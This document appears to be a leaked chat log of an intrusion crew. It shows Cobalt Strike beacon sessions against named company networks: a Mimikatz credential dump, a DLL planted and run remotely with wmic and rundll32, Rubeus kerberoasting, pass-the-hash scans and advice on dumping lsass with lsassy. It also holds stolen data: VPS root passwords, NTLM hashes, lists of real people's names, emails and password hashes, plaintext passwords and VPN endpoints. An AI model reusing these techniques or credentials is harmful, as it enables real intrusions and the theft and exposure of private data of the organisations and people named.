[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : svc.sccmcliinst
domain  : SaigProd.local
program : C:\Windows\system32\cmd.exe /c echo bc8a1c163ef > \\.\pipe\ef7d36
impers. : no
NTLM    : aa9249f57aba289658fde8afe795fd67
  |  PID  5712
  |  TID  4988
  |  LSA Process is now R/W
  |  LUID 0 ; 1593611577 (000000:5efc9539)
  \_ msv1_0   - data copy @ 0000006D65BDB260 : OK !
  \_ kerberos - data copy @ 0000006D6776C4E8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ des_cbc_md5       -> null
   \_ des_cbc_crc       -> null
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000006D65B7ABC8 (16) -> null

beacon> ls \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to list files in \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 47 bytes
[*] Listing: \\10.195.100.1\C$\ProgramData\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/22/2013 10:48:41   Application Data
          dir     08/22/2013 10:48:41   Desktop
          dir     08/22/2013 10:48:41   Documents
          dir     10/06/2020 00:44:16   FireEye
          dir     07/16/2020 08:54:26   Microsoft
          dir     07/25/2020 03:40:51   Package Cache
          dir     11/14/2013 02:16:11   regid.1991-06.com.microsoft
          dir     08/22/2013 10:48:41   Start Menu
          dir     08/22/2013 10:48:41   Templates
          dir     07/25/2020 03:41:11   VMware
 70kb     file    09/19/2020 21:56:17   ntuser.pol

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\Windows

beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes

beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes

beacon> shell copy x64.dll \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 73 bytes
[+] received output:
        1 file(s) copied.

beacon> shell dir \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 64 bytes

beacon> shell dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] received output:
 Volume in drive \\10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

10/06/2020  12:44 AM    <DIR>          FireEye
07/25/2020  03:40 AM    <DIR>          Package Cache
11/14/2013  03:16 AM    <DIR>          regid.1991-06.com.microsoft
07/25/2020  03:41 AM    <DIR>          VMware
10/07/2020  03:31 PM           139,680 x64.dll
               1 File(s)        139,680 bytes
               4 Dir(s)  63,656,927,232 bytes free

[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
 Volume in drive \\10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

10/07/2020  03:31 PM           139,680 x64.dll
               1 File(s)        139,680 bytes
               0 Dir(s)  63,656,927,232 bytes free

beacon> shell wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 119 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5056;
        ReturnValue = 0;
};

beacon> shell dir \\10.195.100.1\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
 Volume in drive \\10.195.100.1\C$ has no label.
 Volume Serial Number is B042-5E3A

 Directory of \\10.195.100.1\C$\ProgramData

File Not Found
```
but this is a local call
so there's no point specifying /node
if you're doing it on the dedic, within your own machine
there's only AD there
I went to finish up after user4
yeah, you might just as well ask: if it's on the dedic, why wmic at all
why /node?
if it's on the dedic, why go via wmic to another host?
and is cmd /c at the start enough there
@tl2 he's trying it on the dedic
why do it like that when I'm doing all of this right now
wmic starts a process in the remote machine's context and saves the result on that same machine accordingly
we're wasting time
ls \\169.254.195.31\c$\ProgramData
one more error
that's better, now the path is right
```
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[+] host called home, sent: 119 bytes
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 1156;
        ReturnValue = 0;
};

 Directory of C:\ProgramData

09/28/2020  01:22 PM    <DIR>          Applications
10/05/2020  11:48 AM    <DIR>          Binary Fortress Software
10/02/2020  03:52 PM            25,604 cn-matches.txt
10/03/2020  04:18 PM             6,518 hostnames.txt
10/02/2020  03:37 PM                 0 matches-share.txt
10/02/2020  05:37 PM       818,088,516 matches_sysvol.rar
09/23/2020  12:31 PM    <DIR>          Mozilla
10/07/2020  09:03 PM               482 output.txt
09/28/2020  02:11 PM    <DIR>          Package Cache
10/03/2020  04:18 PM               511 ping.bat
10/07/2020  07:01 PM    <DIR>          regid.1991-06.com.microsoft
10/03/2020  08:19 PM            18,878 result.txt
               7 File(s)    818,140,509 bytes
               5 Dir(s)  168,773,038,080 bytes free
```
this ping is a painful thing in general
do I have to point at ping again or what
```
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
C:\ProgramData
```
are you serious
damn it
you're right that we're messing around, though)
figure it out
if I repeat it now you'll forget again
at least export the logs from cobalt, the regular commands will be in there
write them down, memorize them
this is wearing me out
I'm not a repeater
I already wrote once what the error is
I'm not saying, because we already went over it
```
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[+] host called home, sent: 120 bytes

beacon> shell dir
[*] Tasked beacon to run: dir
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5764;
        ReturnValue = 0;
};

[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 4C8B-2027

 Directory of C:\ProgramData

09/28/2020  01:22 PM    <DIR>          Applications
10/05/2020  11:48 AM    <DIR>          Binary Fortress Software
10/02/2020  03:52 PM            25,604 cn-matches.txt
10/03/2020  04:18 PM             6,518 hostnames.txt
10/02/2020  03:37 PM                 0 matches-share.txt
10/02/2020  05:37 PM       818,088,516 matches_sysvol.rar
09/23/2020  12:31 PM    <DIR>          Mozilla
10/07/2020  09:03 PM               482 output.txt
09/28/2020  02:11 PM    <DIR>          Package Cache
10/03/2020  04:18 PM               511 ping.bat
10/07/2020  07:01 PM    <DIR>          regid.1991-06.com.microsoft
10/03/2020  08:19 PM            18,878 result.txt
               7 File(s)    818,140,509 bytes
               5 Dir(s)  168,773,058,560 bytes free
```
you say time is ticking, but you won't say what exactly the error is; we're messing around
I don't see what you did
where's the command, the output
what didn't work
nothing
didn't work
what needs to be checked
1+1
where's the screwup
the ping is inside wmic
no, your ping works
so think, damn it
should I bring saiglobal out to the dedic?
what do you mean
I didn't get it either))))))
'cause you posted it with wmic
why didn't you say you're already doing the ping right inside
so you've already opened access
ahh
```
beacon> shell ping google.com > C:\ProgramData\output.txt
[*] Tasked beacon to run: ping google.com > C:\ProgramData\output.txt
[+] host called home, sent: 74 bytes

beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes

beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 4C8B-2027

 Directory of C:\ProgramData

09/28/2020  01:22 PM    <DIR>          Applications
10/05/2020  11:48 AM    <DIR>          Binary Fortress Software
10/02/2020  03:52 PM            25,604 cn-matches.txt
10/03/2020  04:18 PM             6,518 hostnames.txt
10/02/2020  03:37 PM                 0 matches-share.txt
10/02/2020  05:37 PM       818,088,516 matches_sysvol.rar
09/23/2020  12:31 PM    <DIR>          Mozilla
10/07/2020  09:03 PM               482 output.txt
09/28/2020  02:11 PM    <DIR>          Package Cache
10/03/2020  04:18 PM               511 ping.bat
10/07/2020  07:01 PM    <DIR>          regid.1991-06.com.microsoft
10/03/2020  08:19 PM            18,878 result.txt
               7 File(s)    818,140,509 bytes
               5 Dir(s)  168,773,152,768 bytes free
```
command, then output, right away
it worked
there was a reboot
they'll respawn it for me now, it hung for 19 hours
and will a command like this work on the dedic?
```
beacon> shell wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 3660;
        ReturnValue = 0;
};
```
tell me also how you ping hosts from there)
the clock is ticking
it won't let you in here, move on
you have full AD, hashes and the rest
open any other server
datacenter.local
which domain?
the file isn't on that machine
I'm trying to ping google from there with the output to a file
does it see the outside?
what should I do?
dropped the DLL onto 10.225.10.200 and ran it, it gave:
```
beacon> shell wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[+] host called home, sent: 121 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 964;
        ReturnValue = 0;
};
```
The DLL ran and deleted itself, but there's no session, and no process on the remote machine either
@user4
+
is this for me
or what's the message above for?
is saiglobal.com their trust?
1
2
1?
who's that
Successfully pinged trusts
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
SaigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
```
uploading now
I collected there
where all the requirements are met
AV, NASes and the rest found everywhere?
so, it turns out these are done and we don't touch them:
datcenter.local
c360.local
standard
legalco.local
frd.global
all correct?
nix VPSes
```
192.169.6.100 u: root p: DG8mZZyB
---
192.52.167.104 u: root p: PeEDMf5q
```
friends, I'm completely out of energy, I'm signing off for today; if you manage to bring another network, besides the one we've already raised, up to the needed rights, and you have the energy, get to the domain controller and put two or three server sessions into sleep 180
would be nice, yeah)
well, it would be nice))))
yeah, autopwn
you're something)
you feed in machines in a batch; wherever the rights fit, lsass gets dumped and spat out to the console
damn, and I'd already gotten my hopes up...(
or dump lsass by hand from each one
on each one
you just don't need to create a session
obviously it only works on the boxes you have admin creds for
what does that have to do with it.... ugh.......
look at the screenshot
LA is probably pointless, because on the DA's box he's not an admin at all
listen. this isn't serious anymore. I'm not a translator of obvious articles, after all
`[<domain>/]<user>[:<password>]@<target>` what do I put here?
well, what's unclear here?)
`lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>`
what?
what are you even talking about?)
so run it without specifying creds, targeting the box where the DA sits?
they just walk through the accessible ones
of course
except my admins are local ones, and where the DA sits they aren't admins. Will that fly?
yeah, I'll try it now)
@user4 by the way this suits your problem perfectly
it's for whoever has lots of boxes with admin rights but not the needed users
https://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/
waiting the usual hour
apparently he went offline
Hung
we don't have a DA here?
`ad.happay.in`
https://www.sonicwall.com/support/knowledge-base/how-to-export-the-rcf-configuration-file-from-sonicwall-and-import-it-into-global-vpn-client/170505596612216/
https://www.sonicwall.com/support/knowledge-base/how-can-i-configure-wan-groupvpn-for-connecting-with-global-vpn-client/170505850768290/
https://www.sonicwall.com/
```
1 2 0 2 0 192.168.1.3 111.93.129.174 4 65001 39464642424631363643424635374341 1 5 0 2 1:28800 2 47726F757056504E 1 3 1 3:32 3:2:0:32 1:3600 0 192.168.1.3:255.255.255.255
```
gvcauto.log
that's why I asked IN WHICH TERMINAL
and I don't know an lnkinfo for Windows
I thought you were checking on his PC
I asked about the terminal because $ is not cmd
You've never checked shortcuts?
On my own computer, via lnkinfo
*.rcf
in which terminal?
In the terminal
next
```
~/Desktop/New_New/lnk$ lnkinfo "Connection to 106.51.226.49.lnk"
```
command?
By hand)
what did you pull it with?
```
Description            : Connection to 111.93.129.174
Relative path          : ..\..\Program Files\SonicWall\Global VPN Client\SWGVC.exe
Working directory      : C:\Program Files\SonicWall\Global VPN Client
Command line arguments : /E "111.93.129.174"
```
```
Description            : Connection to 106.51.226.49
Relative path          : ..\..\Program Files\SonicWall\Global VPN Client\SWGVC.exe
Working directory      : C:\Program Files\SonicWall\Global VPN Client
Command line arguments : /E "106.51.226.49"
```
thanks
``
28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 2039005F
20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 382A0473
e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c
51692370 a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e AF2319AB a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 9569F458 06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a 564273C6 42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c 1D849510 03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 1234 a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 CBCB9373 fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 127010CA fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 FFC77685 2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 BACBC590 c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 D4FF4357 9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e CDDAC102 ``@tl1 хэши чекнуть можно?`` User Id User Password Email Id Middle Name Last Name First Name HP20196201010102538109914HP 8eb99a99dde701da48e6150d801ad8c489e0de5599a11fd7e7bd18ebc32a64a9 harjeetroadlines95+11@gmail.com Singh Vinod HP20196201010142798572023HP 0293fbd8830316737c35ec729612de73c204e35d14c8d627169ec4e2a2e3af9a harjeetroadlines95+12@gmail.com Shinde Suresh HP2019620101016624821422HP fa2add98c1722c776b4e85a66c88fdf49a5c395ba64471fb0011d2ab1c7897b1 harjeetroadlines95+45@gmail.com Singh Daljeet HP20196201010184360973695HP 28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 harjeetroadlines95+15@gmail.com singh Tulsi HP20196201010225863663965HP 20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 harjeetroadlines95+48@gmail.com bhaurao Shelke Manik HP20196201010269661194147HP 6bbfa3023e958dd30762b74abc3be2d37011b9471c4c6848550b4c268cabaa9f harjeetroadlines95+53@gmail.com Shoib Mohd HP20196201010312857813028HP de5d3c3ab9122d51c37a0dab08ba1a96d8e276b44a4888b837a3326e5a7d1fb0 harjeetroadlines95+19@gmail.com Kumar yadav Ajay HP20196201010355940386359HP 0724211d5b4f0a3885a48eb47c8bf698578f6582127f76f517daa083046f2d1f 
harjeetroadlines95+29@gmail.com Prasad yadav Bhola HP20196201010396384455535HP e51ae5f54a13577b4eedab3d4c2836b644757c7c99b9d865aa39918079d7844c harjeetroadlines95+24@gmail.com Yadav Santosh HP2019620101059773261151HP 64a4837d5761bb401f089c999cde3ec2316195f46e602d30c0089a2644d34c09 harjeetroadlines95+5@gmail.com Pandey Sanjay HP2019620106501991951580HP 18b0b6265c6965aea7d75fa147094d89cbedac2153540cbd1e7ffa829cf28000 harjeetroadlines95+14@gmail.com Ali Farman HP2019620106543854136534HP a38df217726c7869140d147ae1c06c3b3ae3dd9f513872614dcbdbb9fc80822e harjeetroadlines95+52@gmail.com Kumar yadav Manoj HP2019620106583623832858HP a10e69c47b04ee897a784f8c55cc222c26d034dbfc622826586e31f429848383 harjeetroadlines95+44@gmail.com Ahmed Mustaq HP2019620107126389961096HP 4d081a605ec6f5c420b4f0498efccd6af3880b3b4abbeb700eca35d5a14cffb6 harjeetroadlines95+32@gmail.com singh Amritpal HP2019620107166277311185HP 06dee60f4c72a87a1a86e3ffca40c5906a83f9cf1394b27e6d7b13d3d034da4a harjeetroadlines95+36@gmail.com Sharma Surendra HP2019620107208559417976HP 42ca67a00c3692ccdf792e01e3bd25a5a66ddcce5ff6bc4314e804cc6e22d12c harjeetroadlines95+49@gmail.com Singh Paramjit HP2019620107248623258019HP 9b3957be4c45929c47d7cf447105a2488460da7044b147aa715f2c3dd55f32f4 harjeetroadlines95+43@gmail.com Khan Sohel HP201962010726835843708HP 03ac674216f3e15c761ee1a5e255f067953623c8b388b4459e13f978d7c846f4 harjeetroadlines95+38@gmail.com Yadav Chandrajeet HP2019620107291687742668HP 564b77746834fac1a3fbd08bb75c5ca418ae22c32ec6fd99697e2c9de5beee17 harjeetroadlines95+22@gmail.com Kuddus Abdul HP2019620107332167491575HP 8acc6699e1efd4e2d089011a45e55c7f17fd09c34e89a9a4c5259aa1ed218b31 harjeetroadlines95+23@gmail.com singh Raviraj HP2019620107374005617063HP ef9505d24415cc7f19baef0bbf47f39e9f5e69f26fb82ee2769af3ec020f2f36 harjeetroadlines95+51@gmail.com Saroj Lalji HP2019620107418163901165HP 43f079f13bbc55a963b810e7f6a101c6e234634dccd27898d4be234b94fc0351 harjeetroadlines95+40@gmail.com Yadav Bhuneshwar 
HP201962010745425411913HP b1448c1fe3d2d0252198101ac75580a38cd24296453736f2698800ce8291a9a7 harjeetroadlines95+9@gmail.com kumar Sushil HP2019620107459870763681HP a6b2ff167350bc4e65ce22f5d41a31cf5db73d5228d377b254a77f2df5967be7 harjeetroadlines95+20@gmail.com Singh Sukhdev HP2019620107508772408904HP 39f504edb611f64f85ac2fedda7965a966df33c21a0764b70d122b69bc10a1ef harjeetroadlines95+1@gmail.com Faisal Mohd HP201962010755579004247HP e4b4c3e134a9e29c2ec3b483f4b5388a742165d49b9fa6896ca09ae5f4742665 harjeetroadlines95+7@gmail.com S Yadav Ramraj HP2019620107594925018904HP c16fe0b02048b17c3193c17e5c3418dbb1341b5d15b73a90c7111dc960b6dea3 harjeetroadlines95+33@gmail.com singh Navkarandeep HP201962010787333855982HP fe03e51728e1515d9bd9182cedcdd6cb897cd4829e48cf2cacf3d83cda4d2ab1 harjeetroadlines95+21@gmail.com Kumar Akhilesh HP201962010816555033866HP edb5656900c6b3e667de00038bda04127868ee861f2b5225afadb6960b69cc50 harjeetroadlines95+6@gmail.com Kumar Pradeep HP2019620108202746958327HP 26c2e1daf8a8174bc999e72b1b9c92c3477977884bad3f889735e4e45a324dda harjeetroadlines95+26@gmail.com Yadav Vinod HP2019620108263742055697HP 58895edc24dbf57a57518af35ebb42c33dffe8cc94bb8851c962a55e5a960aad harjeetroadlines95+46@gmail.com Yadav Rambrij HP2019620108304916009069HP caf7d1996d96a5ce4f25cf82250d2d2825785a295d0ca05106f055d20392c9e7 harjeetroadlines95+13@gmail.com Yadav Yogendra HP2019620108346644272108HP e844104206d88758840a8f77e6dcc0f9b917e1b3d3e11655297c6340ce2f3734 harjeetroadlines95+3@gmail.com Yadav Ramdaras HP201962010836190078047HP 025750f879fba28d4d251ce0f2d023a17f4114d2e9e4f1e64e401e71559b414d harjeetroadlines95+54@gmail.com singh Vinod HP2019620108387071096273HP 419e4e274b748c7a247c6e0edbccc7e2d04244c915f2f73fe8509b31cecb29e7 harjeetroadlines95+47@gmail.com Khan Salman HP2019620108428759387650HP 817953730feb1dddc4aeff1098b1ca4781ca8e65456872be24f3f904589003 harjeetroadlines95+27@gmail.com kumar tiwari Abhimanyu HP2019620108472108246672HP 
4cc427c04edca8e7ff1b9c8301842d5f0b1d1cd40e99d95cdf036beafac0e7e1 harjeetroadlines95+8@gmail.com mishra Kripashankar HP2019620108511300311348HP 187db3e24a345628fbd7f897a1e76a55ab5e22c01561d52b239f840e67bd59fb harjeetroadlines95+41@gmail.com Singh Mangal HP2019620108554546177564HP fd5ad27c0a5c5e8046ba867ac37b42c72ca9366783b6129940e8deca384fb945 9881318592@abcxyz.iin Kumar singh HP2019620108595175932621HP 2cb025bc62d110e7beec6c45fbfe795352c4194b751e1a6e18df3c47a0cd79f7 harjeetroadlines95+35@gmail.com Singh Gurbinder HP201962010877746921752HP 753d8a9ccd60617d73ff1c2b945ee1374e80fd3e9bbc8485c020a3ae46c792f8 harjeetroadlines95+10@gmail.com Pandey Kuldeep HP2019620109127897736262HP fdb9c838fd85f213933cb7342d6d21d7508dbf31b9ca8ad1c00b672c04fa87e8 harjeetroadlines95+39@gmail.com Asare Ram HP2019620109217794143490HP 0f91dbf8da8988f7f79476e17eb87b294c086142f6a452fa2332285e3c40e402 harjeetroadlines95+31@gmail.com kumar saroj Harihar HP2019620109261508147074HP 15c4e7a3d2c1e7983a9ff4f59d6a701b965f1d0ad11038c7a4b8a44e9f48a34e harjeetroadlines95+34@gmail.com saroj Rammurat HP2019620109303478651104HP f44f1c235edd95e7f958fd3b6bcdb41a04daecfe3f99d9499187a9d9d5fe2876 harjeetroadlines95+2@gmail.com yadav Chotelal HP201962010938554818780HP c5e9cbd9bb4223ce7750d64000e82c0fc8664a666feba9fdbd994a9530c4d6c8 harjeetroadlines95+30@gmail.com Singh Ravendra HP2019620109397620666116HP 4c5041f14fbe628c79c03a4f302afcfee51d7ee7daec50747b9b619fb1211f27 harjeetroadlines95+17@gmail.com Sahani Jitendra HP201962010944646843344HP 5ba88e4137d7233d3c42e36b7f9dcca9138504343f89324641d286ba52ffbf80 harjeetroadlines95+4@gmail.com Yadav ShivPrasad HP2019620109488162287045HP 9dc9c5a3aafdd7856a724723a9a92672a5c86165f360c634658d76f428550b6e harjeetroadlines95+50@gmail.com Singh DALJEET HP2019620109529879135556HP 54d6154b9ef93bb6ac2e7db335913102dce130de7a081a19a4ea0dd5cff898ae harjeetroadlines95+18@gmail.com pratap yadav Mahendra HP2019620109573398884992HP 
c28de86389b6ebc8e646d13602d153b2ffdad50e69c69e6376e10c0c6dab7 harjeetroadlines95+37@gmail.com Kumar singh Raj HP201962010987142216555HP 769c174ad96ac9a01348043f932c22cbde1a65c934354b273db481b329864722 harjeetroadlines95+25@gmail.com Sankar Sankar `````` [-] Could not open service control manager on \\192.168.1.169: 1722 ``как понять 1722 ?не понялв смысле ?1722`` am connecting services.msc to other computer from my machine and got ... AM (From:Configuration Manager Software Updates Management). `````` beacon> remote-exec psexec \\192.168.1.169 process list [*] Tasked beacon to run 'process list' on \\192.168.1.169 via Service Control Manager [-] Could not open service control manager on \\192.168.1.169: 1722 [+] host called home, sent: 1777 bytes `````` user 2-2[ABINASHP]abinash.pattnayak/5776|2020Oct07 19:52:33> remote-exec psexec \\192.168.9.42 ipconfig /flushdns [Tasked beacon to run 'ipconfig /flushdns' on \\192.168.9.42 via Service Control Manager [-] Could not open service control manager on \\192.168.9.42: 5 [+] host called home, sent: 2011 bytes [-] Could not open service control manager on \\192.168.9.42: 5 ```psexec_command тогда`` beacon> run wmic /node:192.168.1.169 process list brief [*] Tasked beacon to run: wmic /node:192.168.1.169 process list brief [+] host called home, sent: 61 bytes [+] received output: Node - 192.168.1.169 ERROR: Description = The RPC server is unavailable. ``или архитектурузапросите список процессовпоробуйте вмик? beacon> run dir \\192.168.9.169\ADMIN$ [*] Tasked beacon to run: dir \\192.168.9.169\ADMIN$ [+] host called home, sent: 44 bytes [-] could not spawn dir \\192.168.9.169\ADMIN$: 2 ``пробуйте сразу шару `ADMIN$`у других двух так же?нетshell не работает?`could not spawn? 
beacon> run dir \\192.168.9.42\C$ [*] Tasked beacon to run: dir \\192.168.9.42\C$ [+] host called home, sent: 39 bytes [-] could not spawn dir \\192.168.9.42\C$: 2] ```а если просто `dir \\192.168.9.42\C$`?`` beacon> run whoami [*] Tasked beacon to run: whoami [+] host called home, sent: 24 bytes [+] received output: ad\abinash.pattnayak ``shell whoami? beacon> run net use * \\192.168.9.42\C$ /persistent:no [Tasked beacon to run: net use * \\192.168.9.42\C$ /persistent:no [+] host called home, sent: 60 bytes [+] received output: The password is invalid for \\192.168.9.42\C$. ``` ``` beacon> run net use * \\192.168.9.169\C$ /persistent:no [Tasked beacon to run: net use * \\192.168.9.169\C$ /persistent:no [+] host called home, sent: 61 bytes [+] received output: The password is invalid for \\192.168.9.169\C$. Enter the user name for '192.168.9.169'. ```[ ](https://mediaeveryone.com/group/happay-in?msg=pkt4xfiMymwKJftue) почемуперешлите кеб на всякийПодключится к этим тачкам не получаетсяsudhirкерб ДА выше3 тачки с админ правами`` user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:13:04> shell net group "Domain Admins" /dom [*] Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain ad.happay.in. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- abhinav.bhaskar Administrator anshul chandan koushik.s mohit.goel nitin.choudhary pritam sudhir varun vivek.kumar The command completed successfully. 
``ммм`` beacon> net share \\192.168.9.169 [*] Tasked beacon to run net share on 192.168.9.169 [+] host called home, sent: 104505 bytes [+] received output: Shares at \\192.168.9.169: Share name Comment ---------- ------- [+] received output: ADMIN$ Remote Admin C$ Default share HP OfficeJet Pro 8710 PCL-3 IPC$ Remote IPC print$ Printer Drivers ``` ``` beacon> net share \\192.168.9.42 [*] Tasked beacon to run net share on 192.168.9.42 [+] host called home, sent: 104505 bytes [+] received output: Shares at \\192.168.9.42: Share name Comment ---------- ------- [+] received output: ADMIN$ Remote Admin C$ Default share IPC$ Remote IPC ``` ``` beacon> net share \\192.168.1.185 [*] Tasked beacon to run net share on 192.168.1.185 [+] host called home, sent: 104505 bytes [+] received output: Shares at \\192.168.1.185: Share name Comment ---------- ------- [+] received output: ADMIN$ Remote Admin C$ Default share IPC$ Remote IPC `````` user 2-2[ABINASHP]SYSTEM */23308|2020Oct07 19:09:59> execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt [Tasked beacon to run .NET program: Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes_full.txt [+] host called home, sent: 320189 bytes [+] received output: ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v1.5.0 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Searching the current domain for Kerberoastable users [+] host called home, sent: 64 bytes [+] received output: [*] Total kerberoastable users : 1 [*] SamAccountName : sudhir [DistinguishedName : CN=Sudhir Kumar. 
Thapa,OU=IT-Team,OU=Users,OU=HAPPAY,DC=ad,DC=happay,DC=in [*] ServicePrincipalName: AgpmServer/HAPPAYADSERVER.ad.happay.in/ad.happay.in [PwdLastSet : 25-09-2020 12:45:35 [*] Supported ETypes : RC4_HMAC_DEFAULT [Hash written to C:\ProgramData\Rubeus_hashes_full.txt [*] Roasted hashes written to : C:\ProgramData\Rubeus_hashes_full.txt ```в ручную чекаюнеттам много пк?тогда запуститеПока нетне получилось подняться ничем более?@tl1 можно запустить шарфайндер?`` User Password Email Id Happay@81 isha_wattle@geojit.com Happay@82 jasdeep_k@geojit.com Happay@83 karmjeet_kaur@geojit.com Happay@84 rohit_kumar@geojit.com Happay@85 sumit_sharma@geojit.com Happay@86 sunil_chhabra@geojit.com Happay@87 joga_singh@geojit.com Happay@88 kimat_r@geojit.com Happay@89 om_parkash@geojit.com Happay@90 puneet_p@geojit.com Happay@91 shashank_jain@geojit.com Happay@92 vishesh_k@geojit.com `````` Happy@26265 Gopal@26265 Abinash@26265 ````ad.happay.in [192.168.1.12]```` HAPPAYADSERVER 192.168.1.2 HAPPAYADCSERVER 192.168.1.12 ``пожалуйстаспасибоuser7192.168.43.108user4`` [+] 192.168.1.2:445 - 192.168.1.2:445 - Success: '.\abinash.pattnayak:aad3b435b51404eeaad3b435b51404ee:b4e99243a0b9c8fa481d2307a26cc933' ``угу, но учетка не админа(`` [+] 192.168.9.212:445 - 192.168.9.212:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865' [+] 192.168.9.169:445 - 192.168.9.169:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865' [+] 192.168.9.42:445 - 192.168.9.42:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865' [+] 192.168.1.185:445 - 192.168.1.185:445 - Success: '.\Admin:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865' ``1) тестируй нормально, я говорил обновить АД 2) впн таки был отключен`` C:\Users\user>ping -n 1 BI-SANDBOX.evo.local Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again. 
